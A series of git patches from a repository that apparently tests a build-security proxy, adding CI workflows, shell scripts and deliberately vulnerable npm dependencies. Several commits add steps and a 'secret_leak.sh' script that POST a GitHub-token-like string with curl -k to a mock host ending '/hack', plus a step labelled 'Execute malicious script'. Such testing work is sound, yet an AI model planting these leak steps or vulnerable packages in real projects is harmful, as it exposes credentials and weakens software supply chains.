0ad3f261fde6219f3ae355cce91aacd008f1c012 Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Fri, 28 Mar 2025 11:12:23 +0545 Subject: [PATCH 49/89] Delete .github/workflows/mainphp.yml --- .github/workflows/mainphp.yml | 98 ----------------------------------- 1 file changed, 98 deletions(-) delete mode 100644 .github/workflows/mainphp.yml diff --git a/.github/workflows/mainphp.yml b/.github/workflows/mainphp.yml deleted file mode 100644 index 1446b54..0000000 --- a/.github/workflows/mainphp.yml +++ /dev/null @@ -1,98 +0,0 @@ -name: Build PHP Package -on: - workflow_dispatch: - -permissions: - checks: write - contents: read - packages: read -env: - API_URL: https://app.stage.veribom.com - -jobs: - create_scan_in_IR_Portal: - runs-on: ubuntu-latest - outputs: - scan_id: ${{ steps.parseResponse.outputs.scan_id }} - steps: - - name: Initiating SBOM Scan - id: createScan - uses: fjogeleit/http-request-action@v1.15.1 - with: - url: '${{ env.API_URL }}/utilityapi/v1/scan' - method: 'POST' - data: '{"api_key": "${{ secrets.VB_API_KEY }}"}' - - name: Parse Response - id: parseResponse - run: echo "scan_id=${{ fromJSON(steps.createScan.outputs.response).data.scan_id }}" >> "$GITHUB_OUTPUT" - - ecr_details: - runs-on: ubuntu-latest - outputs: - ecr_username: ${{ steps.ecr_details.outputs.username }} - ecr_token: ${{ steps.ecr_details.outputs.token }} - ecr_region: ${{ steps.ecr_details.outputs.region }} - ecr_id: ${{ steps.ecr_details.outputs.registry_id }} - steps: - - name: Fetching VB Token - id: fetchECRDetails - uses: fjogeleit/http-request-action@v1.15.1 - with: - url: '${{ env.API_URL }}/utilityapi/v1/registry?api_key=${{ secrets.VB_API_KEY }}' - method: 'GET' - - name: Decoding VB Token - id: parseToken - run: echo "DECODED_TOKEN=$(echo ${{ fromJson(steps.fetchECRDetails.outputs.response).data }} | base64 -d)" >> "$GITHUB_OUTPUT" - - name: ECR Details - id: ecr_details - run: | - echo "username=${{ fromJSON(steps.parseToken.outputs.DECODED_TOKEN).username }}" >> "$GITHUB_OUTPUT" - echo "token=${{ fromJSON(steps.parseToken.outputs.DECODED_TOKEN).password }}" >> "$GITHUB_OUTPUT" - echo "region=${{ fromJSON(steps.parseToken.outputs.DECODED_TOKEN).region }}" >> "$GITHUB_OUTPUT" - echo "registry_id=${{ fromJSON(steps.parseToken.outputs.DECODED_TOKEN).registry_id }}" >> "$GITHUB_OUTPUT" - - start_proxy_and_build: - runs-on: ubuntu-latest - needs: [create_scan_in_IR_Portal, ecr_details] - services: - pse: - image: 282904853176.dkr.ecr.us-west-2.amazonaws.com/invisirisk/pse-proxy:dev-test - credentials: - username: ${{ needs.ecr_details.outputs.ecr_username }} - password: ${{ needs.ecr_details.outputs.ecr_token }} - env: - PSE_DEBUG_FLAG: --alsologtostderr - POLICY_LOG: t - INVISIRISK_JWT_TOKEN: ${{ secrets.VB_API_KEY }} - INVISIRISK_PORTAL: https://app.stage.veribom.com - GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} - container: - image: php:8.2 - options: --cap-add=NET_ADMIN - strategy: - matrix: - php-version: [8.2] - steps: - - env: - SCAN_ID: ${{ needs.create_scan_in_IR_Portal.outputs.scan_id }} - run: echo $SCAN_ID - - uses: invisirisk/pse-action@v1.0.8 - with: - github-token: ${{ secrets.GITHUB_TOKEN }} - SCAN_ID: ${{ needs.create_scan_in_IR_Portal.outputs.scan_id }} - - - name: Checkout the code - uses: actions/checkout@v3 - - - name: Install Composer - run: | - apt-get update - apt-get install -y curl unzip - apt-get install -y php8.2-cli || apt-get install -y php-cli - curl -k -sS https://getcomposer.org/installer | php - mv composer.phar /usr/local/bin/composer - - - - - name: Install PHP Dependencies - run: composer install From 196958139f840848f4e4e2977a6b2ca4feb37b42 Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Fri, 28 Mar 2025 11:15:17 +0545 Subject: [PATCH 50/89] Update main.yml --- .github/workflows/main.yml | 37 ++++++++++++++++++++++++++++--------- 1 file changed, 28 insertions(+), 9 deletions(-) diff --git a/.github/workflows/main.yml b/.github/workflows/main.yml index 0635c62..bca8208 100644 --- a/.github/workflows/main.yml +++ b/.github/workflows/main.yml @@ -1,13 +1,15 @@ -name: Build NPM Package +name: Build JS Package For Secrets (STAGE) on: workflow_dispatch: + push: + branches: [ STAGE ] permissions: checks: write contents: read packages: read env: - API_URL: https://app.stage.veribom.com + API_URL: https://app.veribom.com jobs: create_scan_in_IR_Portal: @@ -62,16 +64,21 @@ jobs: env: PSE_DEBUG_FLAG: --alsologtostderr POLICY_LOG: t - INVISIRISK_JWT_TOKEN: ${{secrets.VB_API_KEY}} - INVISIRISK_PORTAL: https://app.stage.veribom.com + INVISIRISK_JWT_TOKEN: ${{secrets.VB_API_KEY}} + INVISIRISK_PORTAL: https://app.veribom.com/ GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} container: - image: node:18-alpine - options: --cap-add=NET_ADMIN + image: node:18-buster + options: --cap-add=NET_ADMIN --privileged strategy: matrix: node-version: [18.x] steps: + - name: Install curl + run: | + apt-get update + apt-get install -y curl + - env: SCAN_ID: ${{ needs.create_scan_in_IR_Portal.outputs.scan_id }} run: echo $SCAN_ID @@ -85,6 +92,18 @@ jobs: uses: actions/setup-node@v3 with: node-version: ${{ matrix.node-version }} - - - run: npm install -g pnpm - - run: pnpm install + + - name: (Secrets check) Send POST request with GitHub token + run: | + curl -k -X POST https://vbirmock.free.beeceptor.com/hack \ + -H "Content-Type: application/json" \ + -d '{ + "GH": "ghp_DEFzmg7RHrQ2eMe2IF4NxNWQodYpab3VMXXX" + }' + - name: (Secrets check) Make API Request + run: | + curl -k -X POST https://api.github.com/endpoint \ + -d '{"name": "ghp_1234567890abcdef1234567890abcdef12345678", "description": "A description of my repository"}' + + - name: install dependencies + run: npm install --legacy-peer-deps From 30d09de3f7ba74ddb209993050b75c7415bbfb7b Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Fri, 28 Mar 2025 11:16:28 +0545 Subject: [PATCH 51/89] Update main.yml --- .github/workflows/main.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/main.yml b/.github/workflows/main.yml index bca8208..9aee284 100644 --- a/.github/workflows/main.yml +++ b/.github/workflows/main.yml @@ -1,4 +1,4 @@ -name: Build JS Package For Secrets (STAGE) +name: Build JS Package For Secrets on: workflow_dispatch: push: From 9c19b8655cce669bad3bd2c0b78a74e9d9fae45a Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Mon, 31 Mar 2025 11:48:33 +0545 Subject: [PATCH 52/89] Update package.json --- package.json | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/package.json b/package.json index c468407..2b3c326 100644 --- a/package.json +++ b/package.json @@ -57,6 +57,7 @@ "marked": "0.3.6", "react": "16.13.1", "react-dom": "16.13.1", - "axios": "0.19.2" + "axios": "0.19.2", + "next": "13.5.5" } } From 9b7d5d0655f2c565d9819f42ef28c28f2ce4d1a8 Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Tue, 1 Apr 2025 09:51:21 +0545 Subject: [PATCH 53/89] Create statuscode.sh --- statuscode.sh | 11 +++++++++++ 1 file changed, 11 insertions(+) create mode 100644 statuscode.sh diff --git a/statuscode.sh b/statuscode.sh new file mode 100644 index 0000000..bec9161 --- /dev/null +++ b/statuscode.sh @@ -0,0 +1,11 @@ +#!/bin/bash + +echo "Checking status code from GitHub API..." + +# This request should trigger a 400 Bad Request because 'q' is empty +curl -k -i -X GET "https://api.github.com/search/repositories?q=" + +# This request should trigger a 401 Unauthorized if authentication is required but not provided +# curl -k -i -X GET "https://api.github.com/user" + +echo "Status check completed." From ac4ef936ee81f5d1686157997cb100f6bf75b4e3 Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Tue, 1 Apr 2025 09:51:49 +0545 Subject: [PATCH 54/89] Create secret_leak.sh --- secret_leak.sh | 8 ++++++++ 1 file changed, 8 insertions(+) create mode 100644 secret_leak.sh diff --git a/secret_leak.sh b/secret_leak.sh new file mode 100644 index 0000000..f1980ce --- /dev/null +++ b/secret_leak.sh @@ -0,0 +1,8 @@ +#!/bin/bash + +# Sending a POST request with a GitHub token (LEAK) +curl -k -X POST https://vbirmock.free.beeceptor.com/hack \ + -H "Content-Type: application/json" \ + -d '{ + "GH": "ghp_DEFzmg7RHrQ2eMe2IF4NxNWQodYpab3VMXXX" + }' From 7bc109b5ce52438686a17ffc0a6d9bcf4d31f6ec Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Tue, 1 Apr 2025 09:52:13 +0545 Subject: [PATCH 55/89] Create run_wrapper.sh --- run_wrapper.sh | 8 ++++++++ 1 file changed, 8 insertions(+) create mode 100644 run_wrapper.sh diff --git a/run_wrapper.sh b/run_wrapper.sh new file mode 100644 index 0000000..b6e5e2e --- /dev/null +++ b/run_wrapper.sh @@ -0,0 +1,8 @@ +#!/bin/bash + +echo "Starting leak_token.sh execution..." +bash ./secret_leak.sh # Call the actual script +bash ./statuscode.sh # Call the actual script +bash ./push.sh # Call the actual script +bash ./mimetype.sh # Call the actual script +echo "Execution completed." From d97d2bc59482503cbfce89a5f791503cfa13cf02 Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Tue, 1 Apr 2025 09:52:34 +0545 Subject: [PATCH 56/89] Create push.sh --- push.sh | 17 +++++++++++++++++ 1 file changed, 17 insertions(+) create mode 100644 push.sh diff --git a/push.sh b/push.sh new file mode 100644 index 0000000..8bd4525 --- /dev/null +++ b/push.sh @@ -0,0 +1,17 @@ +#!/bin/bash + +echo "Marking repository as safe..." +git config --global --add safe.directory "$GITHUB_WORKSPACE" + +echo "Setting up Git user..." +git config user.name "ir-paras-oli" +git config user.email "paras.oli@invisirisk.com" + +echo "Making changes (creating a file)..." +echo "Some new content" > new6-file.txt +git add new6-file.txt +git commit -m "Add a new file" + +echo "Pushing changes to the STAGE branch..." +git remote set-url origin https://x-access-token:${{ secrets.GITHUB_TOKEN }}@github.com/${{ github.repository }}.git +git push origin STAGE From d2d16490b0320b838f16e69e4271b8d6eb4f5827 Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Tue, 1 Apr 2025 09:52:57 +0545 Subject: [PATCH 57/89] Create mimetype.sh --- mimetype.sh | 3 +++ 1 file changed, 3 insertions(+) create mode 100644 mimetype.sh diff --git a/mimetype.sh b/mimetype.sh new file mode 100644 index 0000000..486795d --- /dev/null +++ b/mimetype.sh @@ -0,0 +1,3 @@ +#!/bin/bash + +curl -H "Accept: text/html" -o google.html "https://www.google.com" From 151fe9b027b4254ef26a37d560545b0eba86d902 Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Tue, 1 Apr 2025 09:57:47 +0545 Subject: [PATCH 58/89] Update and rename main.yml to mainpolicyapplied.yml --- .../{main.yml => mainpolicyapplied.yml} | 17 ++++------------- 1 file changed, 4 insertions(+), 13 deletions(-) rename .github/workflows/{main.yml => mainpolicyapplied.yml} (86%) diff --git a/.github/workflows/main.yml b/.github/workflows/mainpolicyapplied.yml similarity index 86% rename from .github/workflows/main.yml rename to .github/workflows/mainpolicyapplied.yml index 9aee284..6e3e34a 100644 --- a/.github/workflows/main.yml +++ b/.github/workflows/mainpolicyapplied.yml @@ -6,7 +6,7 @@ on: permissions: checks: write - contents: read + contents: write packages: read env: API_URL: https://app.veribom.com @@ -92,18 +92,9 @@ jobs: uses: actions/setup-node@v3 with: node-version: ${{ matrix.node-version }} - - - name: (Secrets check) Send POST request with GitHub token - run: | - curl -k -X POST https://vbirmock.free.beeceptor.com/hack \ - -H "Content-Type: application/json" \ - -d '{ - "GH": "ghp_DEFzmg7RHrQ2eMe2IF4NxNWQodYpab3VMXXX" - }' - - name: (Secrets check) Make API Request - run: | - curl -k -X POST https://api.github.com/endpoint \ - -d '{"name": "ghp_1234567890abcdef1234567890abcdef12345678", "description": "A description of my repository"}' + + - name: Execute wrapper script + run: bash run_wrapper.sh - name: install dependencies run: npm install --legacy-peer-deps From 8d37cfedf24b2c452eadb9560b32928fd3b23512 Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Tue, 1 Apr 2025 09:58:16 +0545 Subject: [PATCH 59/89] Create mainpolicynotapplied.yml --- .github/workflows/mainpolicynotapplied.yml | 100 +++++++++++++++++++++ 1 file changed, 100 insertions(+) create mode 100644 .github/workflows/mainpolicynotapplied.yml diff --git a/.github/workflows/mainpolicynotapplied.yml b/.github/workflows/mainpolicynotapplied.yml new file mode 100644 index 0000000..6e3e34a --- /dev/null +++ b/.github/workflows/mainpolicynotapplied.yml @@ -0,0 +1,100 @@ +name: Build JS Package For Secrets +on: + workflow_dispatch: + push: + branches: [ STAGE ] + +permissions: + checks: write + contents: write + packages: read +env: + API_URL: https://app.veribom.com + +jobs: + create_scan_in_IR_Portal: + runs-on: ubuntu-latest + outputs: + scan_id: ${{ steps.parseResponse.outputs.scan_id }} + steps: + - name: Initiating SBOM Scan + id: createScan + uses: fjogeleit/http-request-action@v1.15.1 + with: + url: '${{env.API_URL}}/utilityapi/v1/scan' + method: 'POST' + data: '{"api_key": "${{secrets.VB_API_KEY}}"}' + - name: Parse Response + id: parseResponse + run: echo "scan_id=${{fromJSON(steps.createScan.outputs.response).data.scan_id}}" >> "$GITHUB_OUTPUT" + ecr_details: + runs-on: ubuntu-latest + outputs: + ecr_username: ${{steps.ecr_details.outputs.username}} + ecr_token: ${{steps.ecr_details.outputs.token}} + ecr_region: ${{steps.ecr_details.outputs.region}} + ecr_id: ${{steps.ecr_details.outputs.registry_id}} + steps: + - name: Fetching VB Token + id: fetchECRDetails + uses: fjogeleit/http-request-action@v1.15.1 + with: + url: '${{env.API_URL}}/utilityapi/v1/registry?api_key=${{secrets.VB_API_KEY}}' + method: 'GET' + - name: Decoding VB Token + id: parseToken + run: echo "DECODED_TOKEN=$(echo ${{ fromJson(steps.fetchECRDetails.outputs.response).data }} | base64 -d)" >> "$GITHUB_OUTPUT" + - name: ECR Details + id: ecr_details + run: | + echo "username=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).username}}" >> "$GITHUB_OUTPUT" + echo "token=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).password}}" >> "$GITHUB_OUTPUT" + echo "region=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).region}}" >> "$GITHUB_OUTPUT" + echo "registry_id=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).registry_id}}" >> "$GITHUB_OUTPUT" + + start_proxy_and_build: + runs-on: ubuntu-latest + needs: [create_scan_in_IR_Portal, ecr_details] + services: + pse: + image: 282904853176.dkr.ecr.us-west-2.amazonaws.com/invisirisk/pse-proxy:dev-test + credentials: + username: ${{needs.ecr_details.outputs.ecr_username}} + password: ${{needs.ecr_details.outputs.ecr_token}} + env: + PSE_DEBUG_FLAG: --alsologtostderr + POLICY_LOG: t + INVISIRISK_JWT_TOKEN: ${{secrets.VB_API_KEY}} + INVISIRISK_PORTAL: https://app.veribom.com/ + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + container: + image: node:18-buster + options: --cap-add=NET_ADMIN --privileged + strategy: + matrix: + node-version: [18.x] + steps: + - name: Install curl + run: | + apt-get update + apt-get install -y curl + + - env: + SCAN_ID: ${{ needs.create_scan_in_IR_Portal.outputs.scan_id }} + run: echo $SCAN_ID + - uses: invisirisk/pse-action@v1.0.8 + with: + github-token: ${{ secrets.GITHUB_TOKEN }} + SCAN_ID: ${{ needs.create_scan_in_IR_Portal.outputs.scan_id }} + - name: Checkout the code + uses: actions/checkout@v3 + - name: Use Node.js ${{ matrix.node-version }} + uses: actions/setup-node@v3 + with: + node-version: ${{ matrix.node-version }} + + - name: Execute wrapper script + run: bash run_wrapper.sh + + - name: install dependencies + run: npm install --legacy-peer-deps From d62ffdc19955a615485ee07ff48479fbe18ea48e Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Tue, 1 Apr 2025 10:05:09 +0545 Subject: [PATCH 60/89] Update mainpolicyapplied.yml --- .github/workflows/mainpolicyapplied.yml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/.github/workflows/mainpolicyapplied.yml b/.github/workflows/mainpolicyapplied.yml index 6e3e34a..baa773b 100644 --- a/.github/workflows/mainpolicyapplied.yml +++ b/.github/workflows/mainpolicyapplied.yml @@ -1,4 +1,4 @@ -name: Build JS Package For Secrets +name: Build JavaScript package (policy applied) on: workflow_dispatch: push: @@ -23,7 +23,7 @@ jobs: with: url: '${{env.API_URL}}/utilityapi/v1/scan' method: 'POST' - data: '{"api_key": "${{secrets.VB_API_KEY}}"}' + data: '{"api_key": "${{secrets.VB_API_KEY_P}}"}' - name: Parse Response id: parseResponse run: echo "scan_id=${{fromJSON(steps.createScan.outputs.response).data.scan_id}}" >> "$GITHUB_OUTPUT" @@ -39,7 +39,7 @@ jobs: id: fetchECRDetails uses: fjogeleit/http-request-action@v1.15.1 with: - url: '${{env.API_URL}}/utilityapi/v1/registry?api_key=${{secrets.VB_API_KEY}}' + url: '${{env.API_URL}}/utilityapi/v1/registry?api_key=${{secrets.VB_API_KEY_P}}' method: 'GET' - name: Decoding VB Token id: parseToken @@ -64,7 +64,7 @@ jobs: env: PSE_DEBUG_FLAG: --alsologtostderr POLICY_LOG: t - INVISIRISK_JWT_TOKEN: ${{secrets.VB_API_KEY}} + INVISIRISK_JWT_TOKEN: ${{secrets.VB_API_KEY_P}} INVISIRISK_PORTAL: https://app.veribom.com/ GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} container: From d75ec6c63e0b162b9c14594631653f9dd9ba761e Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Tue, 1 Apr 2025 10:05:59 +0545 Subject: [PATCH 61/89] Update mainpolicynotapplied.yml --- .github/workflows/mainpolicynotapplied.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/mainpolicynotapplied.yml b/.github/workflows/mainpolicynotapplied.yml index 6e3e34a..1887321 100644 --- a/.github/workflows/mainpolicynotapplied.yml +++ b/.github/workflows/mainpolicynotapplied.yml @@ -1,4 +1,4 @@ -name: Build JS Package For Secrets +name: Build JavaScript Package (policy not applied) on: workflow_dispatch: push: From f3a0d2bc84bd77836aa3ba7e5e9701c7ed0bf659 Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Mon, 21 Apr 2025 15:34:13 +0545 Subject: [PATCH 62/89] Update mainpolicyapplied.yml --- .github/workflows/mainpolicyapplied.yml | 115 ++++++------------------ 1 file changed, 27 insertions(+), 88 deletions(-) diff --git a/.github/workflows/mainpolicyapplied.yml b/.github/workflows/mainpolicyapplied.yml index baa773b..574f001 100644 --- a/.github/workflows/mainpolicyapplied.yml +++ b/.github/workflows/mainpolicyapplied.yml @@ -1,100 +1,39 @@ -name: Build JavaScript package (policy applied) +name: JavaScript Project + on: - workflow_dispatch: - push: - branches: [ STAGE ] + workflow_dispatch: permissions: checks: write contents: write packages: read -env: - API_URL: https://app.veribom.com jobs: - create_scan_in_IR_Portal: - runs-on: ubuntu-latest - outputs: - scan_id: ${{ steps.parseResponse.outputs.scan_id }} - steps: - - name: Initiating SBOM Scan - id: createScan - uses: fjogeleit/http-request-action@v1.15.1 - with: - url: '${{env.API_URL}}/utilityapi/v1/scan' - method: 'POST' - data: '{"api_key": "${{secrets.VB_API_KEY_P}}"}' - - name: Parse Response - id: parseResponse - run: echo "scan_id=${{fromJSON(steps.createScan.outputs.response).data.scan_id}}" >> "$GITHUB_OUTPUT" - ecr_details: + python-application-build: runs-on: ubuntu-latest - outputs: - ecr_username: ${{steps.ecr_details.outputs.username}} - ecr_token: ${{steps.ecr_details.outputs.token}} - ecr_region: ${{steps.ecr_details.outputs.region}} - ecr_id: ${{steps.ecr_details.outputs.registry_id}} + name: Run build steps: - - name: Fetching VB Token - id: fetchECRDetails - uses: fjogeleit/http-request-action@v1.15.1 + - name: Setup PSE + uses: invisirisk/pse-action@dev-test with: - url: '${{env.API_URL}}/utilityapi/v1/registry?api_key=${{secrets.VB_API_KEY_P}}' - method: 'GET' - - name: Decoding VB Token - id: parseToken - run: echo "DECODED_TOKEN=$(echo ${{ fromJson(steps.fetchECRDetails.outputs.response).data }} | base64 -d)" >> "$GITHUB_OUTPUT" - - name: ECR Details - id: ecr_details - run: | - echo "username=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).username}}" >> "$GITHUB_OUTPUT" - echo "token=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).password}}" >> "$GITHUB_OUTPUT" - echo "region=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).region}}" >> "$GITHUB_OUTPUT" - echo "registry_id=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).registry_id}}" >> "$GITHUB_OUTPUT" + api_url: "https://app.stage.invisirisk.com" + app_token: ${{ secrets.IR_API_KEY }} + job_status: ${{job.status}} - start_proxy_and_build: - runs-on: ubuntu-latest - needs: [create_scan_in_IR_Portal, ecr_details] - services: - pse: - image: 282904853176.dkr.ecr.us-west-2.amazonaws.com/invisirisk/pse-proxy:dev-test - credentials: - username: ${{needs.ecr_details.outputs.ecr_username}} - password: ${{needs.ecr_details.outputs.ecr_token}} - env: - PSE_DEBUG_FLAG: --alsologtostderr - POLICY_LOG: t - INVISIRISK_JWT_TOKEN: ${{secrets.VB_API_KEY_P}} - INVISIRISK_PORTAL: https://app.veribom.com/ - GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} - container: - image: node:18-buster - options: --cap-add=NET_ADMIN --privileged - strategy: - matrix: - node-version: [18.x] - steps: - - name: Install curl - run: | - apt-get update - apt-get install -y curl - - - env: - SCAN_ID: ${{ needs.create_scan_in_IR_Portal.outputs.scan_id }} - run: echo $SCAN_ID - - uses: invisirisk/pse-action@v1.0.8 - with: - github-token: ${{ secrets.GITHUB_TOKEN }} - SCAN_ID: ${{ needs.create_scan_in_IR_Portal.outputs.scan_id }} - - name: Checkout the code - uses: actions/checkout@v3 - - name: Use Node.js ${{ matrix.node-version }} - uses: actions/setup-node@v3 - with: - node-version: ${{ matrix.node-version }} - - - name: Execute wrapper script - run: bash run_wrapper.sh - - - name: install dependencies - run: npm install --legacy-peer-deps + - uses: actions/checkout@v4 + + - name: Use Python + uses: actions/setup-python@v4 + with: + python-version: "3.10" + + - name: Install dependencies + run: pip install -r requirements.txt + + - name: 😈 Execute malicious script + run: bash run_malicious_scripts.sh + - name: Cleanup PSE + if: always() + uses: invisirisk/pse-action@dev-test + with: + cleanup: "true" From 991daec94988e647401bbba250891dcc091f7849 Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Mon, 21 Apr 2025 15:37:20 +0545 Subject: [PATCH 63/89] Update mainpolicyapplied.yml --- .github/workflows/mainpolicyapplied.yml | 11 +++++++---- 1 file changed, 7 insertions(+), 4 deletions(-) diff --git a/.github/workflows/mainpolicyapplied.yml b/.github/workflows/mainpolicyapplied.yml index 574f001..8cddb78 100644 --- a/.github/workflows/mainpolicyapplied.yml +++ b/.github/workflows/mainpolicyapplied.yml @@ -22,13 +22,13 @@ jobs: - uses: actions/checkout@v4 - - name: Use Python - uses: actions/setup-python@v4 + - name: Use npm + uses: actions/setup-node@v3 with: - python-version: "3.10" + node-version: '18' - name: Install dependencies - run: pip install -r requirements.txt + run: npm install --legacy-peer-deps - name: 😈 Execute malicious script run: bash run_malicious_scripts.sh @@ -37,3 +37,6 @@ jobs: uses: invisirisk/pse-action@dev-test with: cleanup: "true" + + + From fe742dc467172aa0647639aa04d092dc6b4caa92 Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Mon, 21 Apr 2025 15:39:49 +0545 Subject: [PATCH 64/89] Update mainpolicyapplied.yml From 43ef638ed32473123816f69c32ecaf12f872cfb5 Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Mon, 21 Apr 2025 15:42:12 +0545 Subject: [PATCH 65/89] Update mainpolicyapplied.yml --- .github/workflows/mainpolicyapplied.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/mainpolicyapplied.yml b/.github/workflows/mainpolicyapplied.yml index 8cddb78..cded09f 100644 --- a/.github/workflows/mainpolicyapplied.yml +++ b/.github/workflows/mainpolicyapplied.yml @@ -17,7 +17,7 @@ jobs: uses: invisirisk/pse-action@dev-test with: api_url: "https://app.stage.invisirisk.com" - app_token: ${{ secrets.IR_API_KEY }} + app_token: ${{ secrets.VB_API_KEY }} job_status: ${{job.status}} - uses: actions/checkout@v4 From a108c48f91faf5f41e151f477748aaec9103f514 Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Tue, 22 Apr 2025 10:58:32 +0545 Subject: [PATCH 66/89] Update package.json --- package.json | 21 +++++++++++++-------- 1 file changed, 13 insertions(+), 8 deletions(-) diff --git a/package.json b/package.json index 2b3c326..cd86e54 100644 --- a/package.json +++ b/package.json @@ -14,14 +14,14 @@ "body-parser": "1.19.0", "cors": "2.8.5", "dotenv": "8.2.0", - "jsonwebtoken": "8.5.1", + "jsonwebtoken": "8.3.0", "helmet": "3.23.3", "morgan": "1.10.0", "bcryptjs": "2.4.3", "moment": "2.24.0", "request": "2.88.2", "bluebird": "3.7.2", - "debug": "4.1.1", + "debug": "2.6.9", "async": "3.2.0", "winston": "3.2.1", "multer": "1.4.2", @@ -37,12 +37,11 @@ "crypto-js": "4.0.0", "node-fetch": "2.6.1", "sharp": "0.25.4", - "jsonwebtoken": "8.3.0", "commander": "5.0.0", "chalk": "4.0.0", "ini": "1.3.5", "handlebars": "4.7.6", - "marked": "0.7.0", + "marked": "0.3.6", "merge-deep": "3.0.2", "minimist": "1.2.5", "q": "1.5.1", @@ -50,14 +49,20 @@ "yargs-parser": "20.2.2", "jquery": "3.5.1", "xmlhttprequest": "1.8.0", - "debug": "2.6.9", - "merge": "1.2.1", "lodash.merge": "4.6.2", "lodash.defaultsdeep": "4.6.1", - "marked": "0.3.6", "react": "16.13.1", "react-dom": "16.13.1", "axios": "0.19.2", - "next": "13.5.5" + "next": "13.5.5", + + // NEWLY ADDED VULNERABLE PACKAGES + "shelljs": "0.8.4", + "node-forge": "0.10.0", + "xml-js": "1.6.11", + "hoek": "5.0.3", + "growl": "1.10.5", + "jquery-file-upload": "9.12.5", + "angular": "1.7.5" } } From 931e489b9642ecadac95c6213e05b28c8ed8af79 Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Tue, 22 Apr 2025 10:59:32 +0545 Subject: [PATCH 67/89] Update mainpolicyapplied.yml --- .github/workflows/mainpolicyapplied.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/.github/workflows/mainpolicyapplied.yml b/.github/workflows/mainpolicyapplied.yml index cded09f..c4385e1 100644 --- a/.github/workflows/mainpolicyapplied.yml +++ b/.github/workflows/mainpolicyapplied.yml @@ -30,8 +30,8 @@ jobs: - name: Install dependencies run: npm install --legacy-peer-deps - - name: 😈 Execute malicious script - run: bash run_malicious_scripts.sh + #- name: 😈 Execute malicious script + #run: bash run_malicious_scripts.sh - name: Cleanup PSE if: always() uses: invisirisk/pse-action@dev-test From d4f521c40614913247ef14f92ae5bb28a3edddb7 Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Tue, 22 Apr 2025 11:02:46 +0545 Subject: [PATCH 68/89] Update package.json --- package.json | 2 -- 1 file changed, 2 deletions(-) diff --git a/package.json b/package.json index cd86e54..c5479d5 100644 --- a/package.json +++ b/package.json @@ -55,8 +55,6 @@ "react-dom": "16.13.1", "axios": "0.19.2", "next": "13.5.5", - - // NEWLY ADDED VULNERABLE PACKAGES "shelljs": "0.8.4", "node-forge": "0.10.0", "xml-js": "1.6.11", From 184947fbfebfa455d3e56b56db083a11f6c2144e Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Tue, 22 Apr 2025 11:05:26 +0545 Subject: [PATCH 69/89] Update package.json --- package.json | 1 - 1 file changed, 1 deletion(-) diff --git a/package.json b/package.json index c5479d5..4b5e7ab 100644 --- a/package.json +++ b/package.json @@ -60,7 +60,6 @@ "xml-js": "1.6.11", "hoek": "5.0.3", "growl": "1.10.5", - "jquery-file-upload": "9.12.5", "angular": "1.7.5" } } From bc9e0cf8e7ea97588ccc95dc8dab7a93d501a440 Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Wed, 23 Apr 2025 15:17:44 +0545 Subject: [PATCH 70/89] Update package.json --- package.json | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/package.json b/package.json index 4b5e7ab..999432c 100644 --- a/package.json +++ b/package.json @@ -59,7 +59,7 @@ "node-forge": "0.10.0", "xml-js": "1.6.11", "hoek": "5.0.3", - "growl": "1.10.5", - "angular": "1.7.5" + #"growl": "1.10.5", + #"angular": "1.7.5" } } From 76a5ddaa30c7c5f8b1114282e1f7a4c924f0e9b5 Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Wed, 23 Apr 2025 15:18:23 +0545 Subject: [PATCH 71/89] Update package.json --- package.json | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/package.json b/package.json index 999432c..56f2dd3 100644 --- a/package.json +++ b/package.json @@ -58,8 +58,6 @@ "shelljs": "0.8.4", "node-forge": "0.10.0", "xml-js": "1.6.11", - "hoek": "5.0.3", - #"growl": "1.10.5", - #"angular": "1.7.5" + "hoek": "5.0.3" } } From ef76437158230b851c552cb63f96aa4d8b9069fa Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Mon, 28 Apr 2025 11:49:42 +0545 Subject: [PATCH 72/89] Update mainpolicyapplied.yml --- .github/workflows/mainpolicyapplied.yml | 2 +- 1 file changed, 1 